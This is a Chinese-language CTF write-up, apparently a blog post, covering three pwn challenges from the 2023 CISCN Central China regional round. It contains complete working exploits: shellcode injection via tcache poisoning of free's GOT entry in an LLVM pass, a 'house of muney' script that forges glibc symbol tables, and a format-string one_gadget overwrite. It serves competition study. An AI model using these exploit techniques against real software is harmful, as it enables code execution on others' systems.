2023CISCN—华中赛区—pwn wp

llvm

之前写过几篇llvm的分析和题解,感觉这次ciscn还得出llvm,不过这个llvm相对之前的还是比较简单的,漏洞点也是白给,利用也较为简单。(这里我用的是ubuntu20。)

程序分析

先简单贴一下程序大致流程

Add函数

 Del函数

Edit函数

 

 Alloc函数

 EditAlloc函数

 代码大概就是这样,刚开始做的时候已经把一些llvm函数忘得差不多了,又看winmt的博客补了一下。

add函数:申请一个堆块

del函数:释放一个堆块

edit函数:对一个堆块进行edit,存在溢出

alloc函数:申请一块rwx内存,地址0x10000

editalloc函数:像0x10000内存写入一个堆地址存放的数据指向的地址(感觉没啥用)

漏洞利用

1.申请几个连续的大小相同的堆块,释放中间两个,修改上边的堆块的fd指针为0x10000。

2.申请两个堆块,其中第二个堆块指向0x10000,调用alloc函数将0x10000设置为rwx,向其中写入shellcode的字节码,注意顺序即可。

3.再释放两个相邻堆块,改堆块fd为free_got,申请回free_got,将其改为0x10000。

4.退出llvm.so时执行free函数,执行我们的shellcode来get shell。

几个注意点

1、我在做这个题的时候,刚开始用clang-15编译,然后用opt-10执行一直报错,这里clang应该与opt的版本对应,太久没看过llvm了。

2、在程序执行的时候,首先跑llvm.so,在跑完退出时会调用opt里的函数,这里opt是没有开pie的,所以改opt里的free_got函数。

exp

#include<stdio.h>
int Add(int size){

}

int Del(int index){

}
int Edit(int index,int offset,int content){

}

int Alloc(){

}
int EditAlloc(int index,int offset){

}
int Hello(){

	Add(0x1000);//0
	Add(0x1000);//1
	Add(0x1000);//2
//\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
	Add(176);//3
	Add(176);//4
	Add(176);//5
	Add(176);//6

	Add(176);//7
	Add(176);//8
	Add(176);//9
	Add(176);//10
	Del(5);
	Del(4);
	Edit(3,48,65536);
	Alloc();
	Add(176);//4
	Add(176);//5-->0x10000
	Edit(5,0,0x56f63148);  
    Edit(5,1,0x622fbf48);  
    Edit(5,2,0x2f2f6e69);  
    Edit(5,3,0x54576873);  
    Edit(5,4,0x583b6a5f);  
    Edit(5,5,0x050f99);  
	// Edit(5,5,0x050f99); 
	Del(9);
	Del(8);
	Edit(7,48,0x78b108);
	Add(176);//8
	Add(176);//9--->free_got
	Edit(9,0,0x10000);
	Edit(9,1,0);


	return 0;
	
}

调试

其实我感觉llvm难点就是调试,这里首先给出几个命令。

test.c编译为test.ll

/usr/bin/clang-10 -emit-llvm -S test.c -o test.ll

gdb动态调试

gdb opt-10
set args -load ./LLVMHello.so -Hello ./test.ll
b main
r

首先跑完一大堆的llvm函数,然后用llvm.so加偏移下断点

这里我直接用exp跑。

Alloc函数执行

将shellcode写入0x10000

链入free_got

 修改free_got为0x10000

执行exit

 跑掉一大堆其他plt,进入free_plt

 成功执行shellcode

muney 

这个题看了roderick师傅的博客和pukrquq的博客,弄了挺长时间,不过总算会了。

程序分析

前边一大堆的逆向,需要知道http数据包如何构造,这个跟上海磐石杯那个hp题挺像的,具体逆向不再分析,主要说一下house of muney这个方法(以前就没有听过)。

利用手法

当堆管理器分配超大内存时,会调用mmap函数申请内存,申请的内存一般位于libc.so.6内存的低地址处。如果可以修改mmap申请的这段内存的size,那么我们再次申请回来就可以覆盖掉libc.so.6的符号表,哈希表等空间并进行改写伪造,在解析函数实际地址的时候就能控制其解析为任意地址,进而控制程序执行流。

这里先给出exp再进行说明:

exp

from pwn import *
context.log_level='debug'
r=process('./muney')
elf=ELF('./muney')
libc=elf.libc

def add(size,cont):
    payload='POST /create HTTP/1.0 \nSize:'+str(size)+"\n"+'Content-Length:'+str(len(cont))+'\n\r\n'+cont
    r.sendafter("HTTP_Parser> ",payload)

def delete(idx):
    payload='POST /delete HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:16" + '\n\r\n' + 'a'*16
    r.sendafter("HTTP_Parser> ",payload)


def edit(idx,offset,cont):
    payload=b'POST /edit HTTP/1.0 \nIdx:' + str(idx).encode() +b'\n'+b'Offset:'+str(offset).encode()+b'\n'+b"Content-Length:"+str(len(cont)).encode()+b'\n\r\n'+cont     
    r.sendafter("HTTP_Parser> ",payload)

def quit(cont):
    payload='POST /quit HTTP/1.0 \n'+'Content-Length:'+str(len(cont))+'\n\r\n'+cont
    r.sendafter("HTTP_Parser> ",payload)

add(0x150000,'a'*16)
edit(0,-8,b'\x02\x10\x17')
delete(0)
add(0x171002,'a'*16)
edit(0,0x152b78,p64(0xaaa101010210130e))
edit(0,0x152ca0,p8(0x86))
edit(0,0x153d6c,p64(0x7c967e3e7c93f2a0))
edit(0,0x156d18-0x8,b"\x90\x22\x05")
edit(0,0x156d18-0x10,b"\xbd\xa1\x1a")
edit(0,0x156d18-0x10+4,b"\x12")
edit(0,0x156d18-0x10+6,b"\xf0")
gdb.attach(r)
quit('a'*16)
r.interactive()

调试

house of muney的关键在于伪造几个值:

  1. bitmask_word
  2. bucket
  3. hasharr
  4. target symbol ->st_value

调试一下看看这几个值在哪里(注意这里需要用到glibc源码调试,这里使用2.31)

需要先跑过一次while(++i < n)

当源码走到这里时,记录一下bitmask_word的值

走到这里,查看一下bucket的值

 走到这里查看一下hasharr。

走到这里会有sym符号表结构的一些值

 这里需要将st_name改成strtab与exit的偏移,st_value改成system的st_value。

编写一个c程序执行system看一下值(这个c程序不能开pie和full relro)

 

是0x52290 。

再来找一下st_name,这里有几个可以选择,试试哪个通就行

 全部找到后就可以edit伪造了。

最后执行exit("/bin/sh");就能get shell。

AWD

程序分析

在main函数中有一个跳转,看一下off_5060位置

可以看到我们输入的shell命令不同,会跳转到不同函数,这跟初赛的shellwego类似。

漏洞点位于echo里的格式化字符串漏洞

由于该shell是循环输入,所以可以循环利用这个格式化字符串漏洞泄露libc和stack,然后劫持libc_start_main为onegadget即可。

exp

from pwn import *
context.log_level='debug'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libc

def shell(payload):
    r.sendlineafter("$ \x1B[0m",payload)

# gdb.attach(r)
shell("echo %29$p a")
libc_base=int(r.recv(14),16)-243-libc.sym['__libc_start_main']
print("libc_base------------->",hex(libc_base))
one_gadget=[0xe3afe,0xe3b01,0xe3b04]
ogg=libc_base+one_gadget[2]
shell("echo %12$p b")
stack=int(r.recv(14),16)
print("stack-------------->",hex(stack))
libc_start_main=stack+0x38

shell("echo %"+str(libc_start_main&0xffff)+'c%31$hn c')
shell("echo %"+str(ogg&0xffff)+"c%59$hn d")
shell("echo %"+str(libc_start_main+2&0xffff)+'c%31$hn e')
shell("echo %"+str((ogg>>16)&0xffff)+"c%59$hn f")
shell("KingKi1L3r")
r.interactive()

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值